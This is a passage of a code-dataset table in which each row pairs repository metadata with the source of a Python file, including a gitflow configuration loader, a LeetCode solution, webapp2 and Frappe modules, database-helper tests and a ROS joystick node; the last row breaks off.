hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f1b7cdef9de310ce5a7fb0146da43f000e1ce55f
| 18,861 |
py
|
Python
|
gitflow/context.py
|
abacusresearch/gitflow
|
81ea7f5d468f9b128cd593f62972f13352bd3a63
|
[
"MIT"
] | null | null | null |
gitflow/context.py
|
abacusresearch/gitflow
|
81ea7f5d468f9b128cd593f62972f13352bd3a63
|
[
"MIT"
] | null | null | null |
gitflow/context.py
|
abacusresearch/gitflow
|
81ea7f5d468f9b128cd593f62972f13352bd3a63
|
[
"MIT"
] | null | null | null |
import atexit
import os
import re
import shutil
from enum import Enum
from typing import List, Optional
import collections
from gitflow import cli, const, repotools, _, utils
from gitflow.common import Result
from gitflow.const import VersioningScheme
from gitflow.properties import PropertyIO
from gitflow.repotools import RepoContext
from gitflow.version import VersionMatcher, VersionConfig
class BuildStepType(Enum):
ASSEMBLE = 'assemble',
TEST = 'test',
INTEGRATION_TEST = 'integration_test',
PACKAGE = 'package',
DEPLOY = 'deploy'
class BuildLabels(Enum):
OPENSHIFT_S2I_TEST = 'com.openshift:s2i'
class BuildStep(object):
name: str = None
commands: list = None
"""a list of command arrays"""
labels: set = None
"""contains labels for mapping to the ci tasks, effectively extending the label set in the enclosing stage"""
class BuildStage(object):
type: str
steps: list = None
labels: list = None
"""contains labels for mapping to ci tasks"""
def __init__(self):
self.steps = list()
self.labels = list()
class Config(object):
# project properties
property_file: str = None
sequence_number_property: str = None
version_property: str = None
# validation mode
strict_mode = True
# version
version_config: VersionConfig = None
# repo
remote_name = None
release_branch_base = None
dev_branch_types = ['feature', 'integration',
'fix', 'chore', 'doc', 'issue']
prod_branch_types = ['fix', 'chore', 'doc', 'issue']
# build config
version_change_actions: List[List[str]] = None
build_stages: list = None
# hard config
# TODO checks on merge base
allow_shared_release_branch_base = False
# TODO distinction of commit-based and purely tag based increments
allow_qualifier_increments_within_commit = True
# TODO config var & CLI option
# requires clean workspace and temporary detachment from branches to be pushed
push_to_local = False
pull_after_bump = True
# properties
@property
def sequential_versioning(self) -> bool:
return self.version_config.versioning_scheme == VersioningScheme.SEMVER_WITH_SEQ
@property
def tie_sequential_version_to_semantic_version(self) -> bool:
return self.version_config.versioning_scheme == VersioningScheme.SEMVER_WITH_SEQ
@property
def commit_version_property(self) -> bool:
return self.version_property is not None
@property
def commit_sequential_version_property(self) -> bool:
return self.sequence_number_property is not None \
and self.sequential_versioning
@property
def requires_property_commits(self) -> bool:
return self.commit_version_property \
or self.commit_sequential_version_property
class AbstractContext(object):
result: Result = None
def __init__(self):
self.result = Result()
def warn(self, message, reason):
self.result.warn(message, reason)
def error(self, exit_code, message, reason, throw: bool = False):
self.result.error(exit_code, message, reason, throw)
def fail(self, exit_code, message, reason):
self.result.fail(exit_code, message, reason)
def add_subresult(self, subresult):
self.result.add_subresult(subresult)
def has_errors(self):
return self.result.has_errors()
def abort_on_error(self):
return self.result.abort_on_error()
def abort(self):
return self.result.abort()
class Context(AbstractContext):
config: Config = None
repo: RepoContext = None
# args
args = None
root = None
batch = False
assume_yes = False
dry_run = False
verbose = const.ERROR_VERBOSITY
pretty = False
# matchers
release_base_branch_matcher: VersionMatcher = None
release_branch_matcher: VersionMatcher = None
work_branch_matcher: VersionMatcher = None
version_tag_matcher: VersionMatcher = None
discontinuation_tag_matcher: VersionMatcher = None
# resources
temp_dirs: list = None
clones: list = None
# misc
git_version: str = None
def __init__(self):
super().__init__()
atexit.register(self.cleanup)
@staticmethod
def create(args: dict, result_out: Result) -> 'Context':
context = Context()
context.config: Config = Config()
if args is not None:
context.args = args
context.batch = context.args['--batch']
context.assume_yes = context.args.get('--assume-yes')
context.dry_run = context.args.get('--dry-run')
# TODO remove this workaround
context.verbose = (context.args['--verbose'] + 1) // 2
context.pretty = context.args['--pretty']
else:
context.args = dict()
# configure CLI
cli.set_allow_color(not context.batch)
# initialize repo context and attempt to load the config file
if '--root' in context.args and context.args['--root'] is not None:
context.root = context.args['--root']
context.repo = RepoContext()
context.repo.dir = context.root
context.repo.verbose = context.verbose
context.git_version = repotools.git_version(context.repo)
# context.repo.use_root_dir_arg = semver.compare(context.git_version, "2.9.0") >= 0
context.repo.use_root_dir_arg = False
repo_root = repotools.git_rev_parse(context.repo, '--show-toplevel')
# None when invalid or bare
if repo_root is not None:
context.repo.dir = repo_root
if context.verbose >= const.TRACE_VERBOSITY:
cli.print("--------------------------------------------------------------------------------")
cli.print("refs in {repo}:".format(repo=context.repo.dir))
cli.print("--------------------------------------------------------------------------------")
for ref in repotools.git_list_refs(context.repo):
cli.print(repr(ref))
cli.print("--------------------------------------------------------------------------------")
config_dir = context.repo.dir
else:
context.repo = None
config_dir = context.root
gitflow_config_file: Optional[str] = None
if context.args['--config'] is not None:
gitflow_config_file = os.path.join(config_dir, context.args['--config'])
if gitflow_config_file is None:
result_out.fail(os.EX_DATAERR,
_("the specified config file does not exist or is not a regular file: {path}.")
.format(path=repr(gitflow_config_file)),
None
)
else:
for config_filename in const.DEFAULT_CONFIGURATION_FILE_NAMES:
path = os.path.join(config_dir, config_filename)
if os.path.exists(path):
gitflow_config_file = path
break
if gitflow_config_file is None:
result_out.fail(os.EX_DATAERR,
_("config file not found.")
.format(path=repr(gitflow_config_file)),
_("Default config files are\n:{list}")
.format(list=const.DEFAULT_CONFIGURATION_FILE_NAMES)
)
if context.verbose >= const.TRACE_VERBOSITY:
cli.print("gitflow_config_file: " + gitflow_config_file)
with open(gitflow_config_file) as json_file:
config = PropertyIO.get_instance_by_filename(gitflow_config_file).from_stream(json_file)
else:
config = object()
build_config_json = config.get(const.CONFIG_BUILD)
context.config.version_change_actions = config.get(const.CONFIG_ON_VERSION_CHANGE, [])
context.config.build_stages = list()
if build_config_json is not None:
stages_json = build_config_json.get('stages')
if stages_json is not None:
for stage_key, stage_json in stages_json.items():
stage = BuildStage()
if isinstance(stage_json, dict):
stage.type = stage_json.get('type') or stage_key
if stage.type not in const.BUILD_STAGE_TYPES:
result_out.fail(
os.EX_DATAERR,
_("Configuration failed."),
_("Invalid build stage type {key}."
.format(key=repr(stage.type)))
)
stage.name = stage_json.get('name') or stage_key
stage_labels = stage_json.get('labels')
if isinstance(stage_labels, list):
stage.labels.extend(stage_labels)
else:
stage.labels.append(stage_labels)
stage_steps_json = stage_json.get('steps')
if stage_steps_json is not None:
for step_key, step_json in stage_steps_json.items():
step = BuildStep()
if isinstance(step_json, dict):
step.name = step_json.get('name') or step_key
step.commands = step_json.get('commands')
stage_labels = stage_json.get('labels')
if isinstance(stage_labels, list):
stage.labels.extend(stage_labels)
else:
stage.labels.append(stage_labels)
elif isinstance(step_json, list):
step.name = step_key
step.type = step_key
step.commands = step_json
else:
result_out.fail(
os.EX_DATAERR,
_("Configuration failed."),
_("Invalid build step definition {type} {key}."
.format(type=repr(type(step_json)), key=repr(step_key)))
)
stage.steps.append(step)
elif isinstance(stage_json, list):
stage.type = stage_key
stage.name = stage_key
if len(stage_json):
step = BuildStep()
step.name = '#'
step.commands = stage_json
stage.steps.append(step)
else:
result_out.fail(
os.EX_DATAERR,
_("Configuration failed."),
_("Invalid build stage definition {key}."
.format(key=repr(stage_key)))
)
context.config.build_stages.append(stage)
context.config.build_stages.sort(key=utils.cmp_to_key(lambda stage_a, stage_b:
const.BUILD_STAGE_TYPES.index(stage_a.type)
- const.BUILD_STAGE_TYPES.index(stage_b.type)
),
reverse=False
)
# project properties config
context.config.property_file = config.get(const.CONFIG_PROJECT_PROPERTY_FILE)
if context.config.property_file is not None:
context.config.property_file = os.path.join(context.root, context.config.property_file)
context.config.version_property = config.get(const.CONFIG_VERSION_PROPERTY)
context.config.sequence_number_property = config.get(
const.CONFIG_SEQUENCE_NUMBER_PROPERTY)
context.config.version_property = config.get(
const.CONFIG_VERSION_PROPERTY)
property_names = [property for property in
[context.config.sequence_number_property, context.config.version_property] if
property is not None]
duplicate_property_names = [item for item, count in collections.Counter(property_names).items() if count > 1]
if len(duplicate_property_names):
result_out.fail(os.EX_DATAERR, _("Configuration failed."),
_("Duplicate property names: {duplicate_property_names}").format(
duplicate_property_names=', '.join(duplicate_property_names))
)
# version config
context.config.version_config = VersionConfig()
versioning_scheme = config.get(const.CONFIG_VERSIONING_SCHEME, const.DEFAULT_VERSIONING_SCHEME)
if versioning_scheme not in const.VERSIONING_SCHEMES:
result_out.fail(os.EX_DATAERR, _("Configuration failed."),
_("The versioning scheme {versioning_scheme} is invalid.").format(
versioning_scheme=utils.quote(versioning_scheme, '\'')))
context.config.version_config.versioning_scheme = const.VERSIONING_SCHEMES[versioning_scheme]
if context.config.version_config.versioning_scheme == VersioningScheme.SEMVER:
qualifiers = config.get(const.CONFIG_VERSION_TYPES, const.DEFAULT_PRE_RELEASE_QUALIFIERS)
if isinstance(qualifiers, str):
qualifiers = [qualifier.strip() for qualifier in qualifiers.split(",")]
if qualifiers != sorted(qualifiers):
result_out.fail(
os.EX_DATAERR,
_("Configuration failed."),
_("Pre-release qualifiers are not specified in ascending order.")
)
context.config.version_config.qualifiers = qualifiers
context.config.version_config.initial_version = const.DEFAULT_INITIAL_VERSION
elif context.config.version_config.versioning_scheme == VersioningScheme.SEMVER_WITH_SEQ:
context.config.version_config.qualifiers = None
context.config.version_config.initial_version = const.DEFAULT_INITIAL_SEQ_VERSION
else:
context.fail(os.EX_CONFIG, "configuration error", "invalid versioning scheme")
# branch config
context.config.remote_name = "origin"
context.config.release_branch_base = config.get(const.CONFIG_RELEASE_BRANCH_BASE,
const.DEFAULT_RELEASE_BRANCH_BASE)
remote_prefix = repotools.create_ref_name(const.REMOTES_PREFIX, context.config.remote_name)
context.release_base_branch_matcher = VersionMatcher(
[const.LOCAL_BRANCH_PREFIX, remote_prefix],
None,
re.escape(context.config.release_branch_base),
)
context.release_branch_matcher = VersionMatcher(
[const.LOCAL_BRANCH_PREFIX, remote_prefix],
config.get(
const.CONFIG_RELEASE_BRANCH_PREFIX,
const.DEFAULT_RELEASE_BRANCH_PREFIX),
config.get(
const.CONFIG_RELEASE_BRANCH_PATTERN,
const.DEFAULT_RELEASE_BRANCH_PATTERN),
)
context.work_branch_matcher = VersionMatcher(
[const.LOCAL_BRANCH_PREFIX, remote_prefix],
[const.BRANCH_PREFIX_DEV, const.BRANCH_PREFIX_PROD],
config.get(
const.CONFIG_WORK_BRANCH_PATTERN,
const.DEFAULT_WORK_BRANCH_PATTERN),
)
context.version_tag_matcher = VersionMatcher(
[const.LOCAL_TAG_PREFIX],
config.get(
const.CONFIG_VERSION_TAG_PREFIX,
const.DEFAULT_VERSION_TAG_PREFIX),
config.get(
const.CONFIG_VERSION_TAG_PATTERN,
const.DEFAULT_SEMVER_VERSION_TAG_PATTERN
if context.config.version_config.versioning_scheme == VersioningScheme.SEMVER
else const.DEFAULT_SEMVER_WITH_SEQ_VERSION_TAG_PATTERN)
)
context.version_tag_matcher.group_unique_code = None \
if context.config.version_config.versioning_scheme == VersioningScheme.SEMVER \
else 'prerelease_type'
context.discontinuation_tag_matcher = VersionMatcher(
[const.LOCAL_TAG_PREFIX],
config.get(
const.CONFIG_DISCONTINUATION_TAG_PREFIX,
const.DEFAULT_DISCONTINUATION_TAG_PREFIX),
config.get(
const.CONFIG_DISCONTINUATION_TAG_PATTERN,
const.DEFAULT_DISCONTINUATION_TAG_PATTERN),
None
)
return context
def add_temp_dir(self, dir):
if self.temp_dirs is None:
self.temp_dirs = list()
self.temp_dirs.append(dir)
pass
def get_release_branches(self, reverse: bool = True):
release_branches = list(filter(
lambda branch_ref: self.release_branch_matcher.format(
branch_ref.name) is not None,
repotools.git_list_refs(self.repo,
repotools.create_ref_name(const.REMOTES_PREFIX, self.config.remote_name),
const.LOCAL_BRANCH_PREFIX)
))
release_branches.sort(
reverse=reverse,
key=self.release_branch_matcher.key_func
)
return release_branches
def cleanup(self):
atexit.unregister(self.cleanup)
if self.temp_dirs is not None:
for temp_dir in self.temp_dirs:
if self.verbose >= const.DEBUG_VERBOSITY:
cli.print("deleting temp dir: " + temp_dir)
shutil.rmtree(temp_dir)
self.temp_dirs.clear()
if self.clones is not None:
for clone in self.clones:
clone.cleanup()
self.clones.clear()
def __del__(self):
self.cleanup()
| 38.64959 | 117 | 0.564233 | 18,444 | 0.977891 | 0 | 0 | 14,012 | 0.742909 | 0 | 0 | 2,061 | 0.109273 |
f1b87ee915b0b88ddd9829337e7a6f4316b55ca5
| 705 |
py
|
Python
|
LeetCode/1219_Path_with_Maximum_Gold/main.py
|
sungmen/Acmicpc_Solve
|
0298a6aec84993a4d8767bd2c00490b7201e06a4
|
[
"MIT"
] | 1 |
2020-07-08T23:16:19.000Z
|
2020-07-08T23:16:19.000Z
|
LeetCode/1219_Path_with_Maximum_Gold/main.py
|
sungmen/Acmicpc_Solve
|
0298a6aec84993a4d8767bd2c00490b7201e06a4
|
[
"MIT"
] | 1 |
2020-05-16T03:12:24.000Z
|
2020-05-16T03:14:42.000Z
|
LeetCode/1219_Path_with_Maximum_Gold/main.py
|
sungmen/Acmicpc_Solve
|
0298a6aec84993a4d8767bd2c00490b7201e06a4
|
[
"MIT"
] | 2 |
2020-05-16T03:25:16.000Z
|
2021-02-10T16:51:25.000Z
|
class Solution:
def __init__(self):
self.m = 0
self.n = 0
def dfs(self, y, x, grid) -> int:
if y < 0 or y >= self.m or x < 0 or x >= self.n or grid[y][x] == 0:
return 0
res = 0
tmpGrid = grid[y][x]
grid[y][x] = 0
for y_, x_ in ((y, x - 1), (y, x + 1), (y - 1, x), (y + 1, x)):
res = max(self.dfs(y_, x_, grid), res)
grid[y][x] = tmpGrid
return grid[y][x] + res
def getMaximumGold(self, grid: List[List[int]]) -> int:
self.m = len(grid)
self.n = len(grid[0])
res = max(self.dfs(i, j, grid) for i in range(self.m) for j in range(self.n))
return res
| 32.045455 | 85 | 0.453901 | 705 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
f1b884785bf603bff438ce57a6af789de6bc8891
| 2,307 |
py
|
Python
|
test/test_modify_contact.py
|
peruana80/python_training
|
0070bdc07b22d80594c029984c9967e56ba51951
|
[
"Apache-2.0"
] | null | null | null |
test/test_modify_contact.py
|
peruana80/python_training
|
0070bdc07b22d80594c029984c9967e56ba51951
|
[
"Apache-2.0"
] | null | null | null |
test/test_modify_contact.py
|
peruana80/python_training
|
0070bdc07b22d80594c029984c9967e56ba51951
|
[
"Apache-2.0"
] | null | null | null |
from model.contact import Contact
from random import randrange
def test_modify_contact_name(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.contact.create(Contact(firstname="test"))
old_contacts = db.get_contact_list()
index = randrange(len(old_contacts))
contact = Contact(first_name="Zmodyfikuj imie", middle_name="Zmodyfikuj drugie imie", last_name="Zmodyfikuj nazwisko", nickname="Zmodyfikuj ksywe", title="Zmodyfikuj tytul",
company="Zmodyfikuj firme", address="Zmodyfikuj adres", home_number="Zmodyfikuj_telefon_domowy", mobile_number="Zmodyfikuj_telefon_komorkowy",
work_number="Zmodyfikuj_telefon_sluzbowy", fax="Zmodyfikuj fax", email="Zmodyfikuj email", email2="Zmodyfikuj email2", email3="Zmodyfikuj email3",
homepage="Zmodyfikuj strone domowa", byear="1990", ayear="2000", address_2="Zmodyfikuj drugi adres", phone2="Zmodyfikuj_telefon domowy 2",
notes="Zmodyfikuj notatki")
contact.id=old_contacts[index].id
app.contact.modify_contact_by_id(contact)
new_contacts = db.get_contact_list()
assert len(old_contacts) == len(new_contacts)
old_contacts[index] = contact
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
if check_ui:
new_contacts = app.contact.get_contact_list()
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
#def test_modify_first_contact_first_name(app):
# if app.contact.count() == 0:
# app.contact.create(Contact(first_name="test"))
# old_contacts = app.contact.get_contact_list()
# app.contact.modify_first_contact(Contact(first_name="zmodyfikuj imie"))
# new_contacts = app.contact.get_contact_list()
# assert len(old_contacts) == len(new_contacts)
#def test_modify_first_contact_email(app):
# if app.contact.count() == 0:
# app.contact.create(Contact(first_name="test"))
# old_contacts = app.contact.get_contact_list()
# app.contact.modify_first_contact(Contact(last_name="Zmodyfikuj nazwisko"))
# new_contacts = app.contact.get_contact_list()
# assert len(old_contacts) == len(new_contacts)
| 56.268293 | 186 | 0.702211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,129 | 0.48938 |
f1b8db0ca9074a5d55378aaf5be9d198fcaa6a0b
| 734 |
py
|
Python
|
base.py
|
oknalv/linky
|
78fba19946e2212b10f3d1a5b27c7d9329556290
|
[
"MIT"
] | null | null | null |
base.py
|
oknalv/linky
|
78fba19946e2212b10f3d1a5b27c7d9329556290
|
[
"MIT"
] | null | null | null |
base.py
|
oknalv/linky
|
78fba19946e2212b10f3d1a5b27c7d9329556290
|
[
"MIT"
] | null | null | null |
import webapp2
from webapp2_extras import sessions
class BaseHandler(webapp2.RequestHandler):
def dispatch(self):
self.session_store = sessions.get_store(request=self.request)
try:
webapp2.RequestHandler.dispatch(self)
finally:
self.session_store.save_sessions(self.response)
@webapp2.cached_property
def session(self):
return self.session_store.get_session()
def set_flash(self, type, message_tag):
if not self.session.get("flash"):
self.session["flash"] = []
self.session["flash"].append([type, message_tag])
def get_flash(self):
ret = self.session.get("flash")
self.session["flash"] = []
return ret
| 29.36 | 69 | 0.647139 | 682 | 0.929155 | 0 | 0 | 95 | 0.129428 | 0 | 0 | 35 | 0.047684 |
f1b9ea9a68748f5299174c8b988d634a02fb6fda
| 6,999 |
py
|
Python
|
tests/test_helpers.py
|
albertoalcolea/dbhelpers
|
c65f77a750cf46874ae7b5b0e6d4930e9df729af
|
[
"Apache-2.0"
] | 2 |
2015-10-31T20:36:22.000Z
|
2021-10-05T12:08:10.000Z
|
tests/test_helpers.py
|
albertoalcolea/dbhelpers
|
c65f77a750cf46874ae7b5b0e6d4930e9df729af
|
[
"Apache-2.0"
] | null | null | null |
tests/test_helpers.py
|
albertoalcolea/dbhelpers
|
c65f77a750cf46874ae7b5b0e6d4930e9df729af
|
[
"Apache-2.0"
] | null | null | null |
import unittest
try:
from unittest.mock import Mock, call
except ImportError:
from mock import Mock, call
from dbhelpers import cm_cursor, fetchiter, fetchone_nt, fetchmany_nt, fetchall_nt, fetchiter_nt
class HelpersTestCase(unittest.TestCase):
def test_cm_cursor(self):
"""
Creates a context manager for a cursor and it is able to commit on exit.
"""
conn = Mock(spec=['cursor', 'commit', 'rollback'])
cursor_mock = Mock()
conn.cursor = Mock(return_value=cursor_mock)
conn.commit = Mock()
conn.rollback = Mock()
# Commit on exit
with cm_cursor(conn) as cursor:
self.assertEqual(cursor, cursor_mock)
self.assertTrue(conn.commit.called)
self.assertFalse(conn.rollback.called)
conn.commit.reset_mock()
# Disable auto commit
with cm_cursor(conn, commit=False) as cursor:
self.assertEqual(cursor, cursor_mock)
self.assertFalse(conn.commit.called)
self.assertFalse(conn.rollback.called)
# If exception no commit
def test_with_exc(conn, commit=True):
with cm_cursor(conn, commit=commit) as cursor:
raise Exception()
# If exception and commit=True, call rollback
self.assertRaises(Exception, test_with_exc, conn=conn, commit=True)
self.assertFalse(conn.commit.called)
self.assertTrue(conn.rollback.called)
conn.rollback.reset_mock()
# If exception and commit=False, no call commit nor rollback
self.assertRaises(Exception, test_with_exc, conn=conn, commit=False)
self.assertFalse(conn.commit.called)
self.assertFalse(conn.rollback.called)
def test_fetchiter(self):
cursor = Mock()
def test_iterator(cursor, use_server_cursor=False, **kwargs):
cursor.fetchmany = Mock(return_value=[1,2,3])
num_it = 0
for row in fetchiter(cursor, **kwargs):
if num_it == 3:
raise StopIteration
self.assertIn(row, [1,2,3])
num_it += 1
if row == 3:
# Stop
if use_server_cursor:
cursor.fetchall = Mock(return_value=[])
else:
cursor.fetchmany = Mock(return_value=[])
self.assertEqual(num_it, 3)
# Standard
test_iterator(cursor)
# Size
test_iterator(cursor, size=2)
cursor.fetchmany.assert_called_with(2)
# Batch
cursor.fetchmany = Mock(return_value=[1,2])
for row in fetchiter(cursor, batch=True):
self.assertEqual(row, [1,2])
# Stop
cursor.fetchmany = Mock(return_value=[])
# Server cursor
cursor.execute = Mock()
cursor.fetchall = Mock(return_value=[1,2,3])
test_iterator(cursor, use_server_cursor=True, size=10, server_cursor='C')
calls = [call("FETCH %s FROM C", (10,))] * 2
cursor.execute.assert_has_calls(calls)
def test_fetchone_nt(self):
cursor = Mock()
cursor.description = (('id', 3, 2, 11, 11, 0, 0), ('status', 253, 7, 80, 80, 0, 0))
cursor.fetchone = Mock(return_value=(34, 'info'))
r = fetchone_nt(cursor)
self.assertEqual(r.__class__.__name__, 'Results')
self.assertEqual(r.id, 34)
self.assertEqual(r.status, 'info')
def test_fetchmany_nt(self):
cursor = Mock()
cursor.description = (('id', 3, 2, 11, 11, 0, 0), ('status', 253, 7, 80, 80, 0, 0))
cursor.fetchmany = Mock(return_value=((34, 'info'), (99, 'warning')))
r = fetchmany_nt(cursor)
self.assertEqual(r.__class__.__name__, 'list')
self.assertEqual(r[0].__class__.__name__, 'Results')
self.assertEqual(r[0].id, 34)
self.assertEqual(r[0].status, 'info')
self.assertEqual(r[1].__class__.__name__, 'Results')
self.assertEqual(r[1].id, 99)
self.assertEqual(r[1].status, 'warning')
def test_fetchall_nt(self):
cursor = Mock()
cursor.description = (('id', 3, 2, 11, 11, 0, 0), ('status', 253, 7, 80, 80, 0, 0))
cursor.fetchall = Mock(return_value=((34, 'info'), (99, 'warning')))
r = fetchall_nt(cursor)
self.assertEqual(r.__class__.__name__, 'list')
self.assertEqual(r[0].__class__.__name__, 'Results')
self.assertEqual(r[0].id, 34)
self.assertEqual(r[0].status, 'info')
self.assertEqual(r[1].__class__.__name__, 'Results')
self.assertEqual(r[1].id, 99)
self.assertEqual(r[1].status, 'warning')
def test_fetchiter_nt(self):
cursor = Mock()
cursor.description = (('id', 3, 2, 11, 11, 0, 0), ('status', 253, 7, 80, 80, 0, 0))
# Standard
cursor.fetchmany = Mock(return_value=((34, 'info'), (99, 'warning')))
num_it = 0
for row in fetchiter_nt(cursor):
self.assertEqual(row.__class__.__name__, 'Results')
if num_it == 0:
self.assertEqual(row.id, 34)
self.assertEqual(row.status, 'info')
if num_it == 1:
self.assertEqual(row.id, 99)
self.assertEqual(row.status, 'warning')
if num_it == 2:
raise StopIteration
num_it += 1
if num_it == 2:
cursor.fetchmany = Mock(return_value=[])
self.assertEqual(num_it, 2)
# Batch
cursor.fetchmany = Mock(return_value=((34, 'info'), (99, 'warning')))
num_it = 0
for row in fetchiter_nt(cursor, batch=True):
self.assertEqual(row.__class__.__name__, 'list')
self.assertEqual(row[0].__class__.__name__, 'Results')
self.assertEqual(row[0].id, 34)
self.assertEqual(row[0].status, 'info')
self.assertEqual(row[1].__class__.__name__, 'Results')
self.assertEqual(row[1].id, 99)
self.assertEqual(row[1].status, 'warning')
if num_it == 1:
raise StopIteration
num_it += 1
if num_it == 1:
cursor.fetchmany = Mock(return_value=[])
self.assertEqual(num_it, 1)
# Server cursor
cursor.fetchall = Mock(return_value=((34, 'info'), (99, 'warning')))
num_it = 0
for row in fetchiter_nt(cursor, server_cursor='C'):
self.assertEqual(row.__class__.__name__, 'Results')
if num_it == 0:
self.assertEqual(row.id, 34)
self.assertEqual(row.status, 'info')
if num_it == 1:
self.assertEqual(row.id, 99)
self.assertEqual(row.status, 'warning')
if num_it == 2:
raise StopIteration
num_it += 1
if num_it == 2:
cursor.fetchall = Mock(return_value=[])
self.assertEqual(num_it, 2)
| 38.456044 | 96 | 0.570796 | 6,784 | 0.969281 | 0 | 0 | 0 | 0 | 0 | 0 | 702 | 0.1003 |
f1baa95b451bcaf546bfb42baf9ea8122be52ea7
| 2,641 |
py
|
Python
|
scripts/joystick_node.py
|
kscottz/owi_arm
|
a08f1ed8a5bccfe8cca5a1fd1829beca15a1060f
|
[
"BSD-2-Clause"
] | null | null | null |
scripts/joystick_node.py
|
kscottz/owi_arm
|
a08f1ed8a5bccfe8cca5a1fd1829beca15a1060f
|
[
"BSD-2-Clause"
] | null | null | null |
scripts/joystick_node.py
|
kscottz/owi_arm
|
a08f1ed8a5bccfe8cca5a1fd1829beca15a1060f
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
# THIS SHEBANG IS REALLY REALLY IMPORTANT
import rospy
import roscpp
import numpy as np
from sensor_msgs.msg import Joy
from std_msgs.msg import Int16MultiArray
class JoystickNode(object):
def __init__(self):
# put away our toys cleanly
rospy.on_shutdown(self.shutdown)
self.pub = rospy.Publisher('robot', Int16MultiArray, queue_size=1)
# subscribe to the joy and state messages
# format is topic, message type, callback function
rospy.Subscriber("/joy", Joy, self.do_it)
rospy.Subscriber("/state", Int16MultiArray, self.update_state)
rospy.init_node('joystick_node')
# our internal state message
self.state = [0,0,0,0,0]
# tell ros to chill unless we get a message.
rospy.spin()
def update_state(self,msg):
# update our internal state every time the robot posts an update
self.state = msg.data
def do_it(self,msg):
# Update our state
if( self.state is None ):
self.state = [0,0,0,0,0]
m1 = self.state[1]
m2 = self.state[2]
m3 = self.state[3]
m4 = self.state[4]
step = 5
# Update our state from our buttons
if(msg.buttons[1] == 1 ):
m1+=step
elif( msg.buttons[2] == 1 ):
m1-=step
if(msg.buttons[0] == 1 ):
m2+=step
elif( msg.buttons[3] ==1 ):
m2-=step
if(msg.axes[-1] > 0 ):
m3+=step
elif( msg.axes[-1] < 0 ):
m3-=step
if(msg.axes[-2] > 0 ):
m4+=step
elif( msg.axes[-2] < 0 ):
m4-=step
# check for updates
data = [self.state[0],
int(np.clip(m1,0,180)),
int(np.clip(m2,0,180)),
int(np.clip(m3,0,120)),
int(np.clip(m4,0,180))]
change = any([abs(a-b)>0 for a,b in zip(data,self.state)])
self.state = data
# if there is a change
if( change ):
# Set the new position out on /robot
out = Int16MultiArray()
rospy.loginfo("sending {0}.".format(data))
out.data = data
self.pub.publish(out)
def shutdown(self):
data = [0,0,0,0]
out = Int16MultiArray()
print "sending {0}.".format(data)
out.data = data
pub.publish(out)
if __name__ == '__main__':
try:
# boiler plate to spin up a node.
rospy.init_node('joystick_node')
node = JoystickNode()
except rospy.ROSInterruptException:
rospy.logwarn('ERROR!!!')
| 31.440476 | 74 | 0.540704 | 2,229 | 0.843998 | 0 | 0 | 0 | 0 | 0 | 0 | 583 | 0.22075 |
f1bc287fa4269a85fe5cdf284f15691d29943f53
| 650 |
py
|
Python
|
nomiapp/nomiapp/doctype/configuracion_isr/configuracion_isr.py
|
YefriTavarez/NomiApp
|
a532ae7a3871ee91ec6f17b4b46ba67db7a056b5
|
[
"MIT"
] | 1 |
2016-12-29T13:58:28.000Z
|
2016-12-29T13:58:28.000Z
|
nomiapp/nomiapp/doctype/configuracion_isr/configuracion_isr.py
|
YefriTavarez/NomiApp
|
a532ae7a3871ee91ec6f17b4b46ba67db7a056b5
|
[
"MIT"
] | null | null | null |
nomiapp/nomiapp/doctype/configuracion_isr/configuracion_isr.py
|
YefriTavarez/NomiApp
|
a532ae7a3871ee91ec6f17b4b46ba67db7a056b5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Soldeva, SRL and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class ConfiguracionISR(Document):
pass
@frappe.whitelist()
def getRangosISR():
return frappe.db.sql("SELECT field, value \
FROM `tabSingles` \
WHERE doctype='Configuracion ISR' \
AND (field like 'from%' OR field like 'to%') \
ORDER BY field", as_dict=1)
comment = """return frappe.db.sql("SELECT value \
FROM `tabSingles` \
WHERE doctype='Configuracion ISR'\
AND field='{0}'"
.format(field),as_dict=1)"""
| 26 | 51 | 0.716923 | 39 | 0.06 | 0 | 0 | 384 | 0.590769 | 0 | 0 | 419 | 0.644615 |
f1be0f593e7493f91a2f96246f4cf8a9df42b366
| 1,367 |
py
|
Python
|
electrumsv_sdk/builtin_components/electrumsv_server/local_tools.py
|
electrumsv/electrumsv-sdk
|
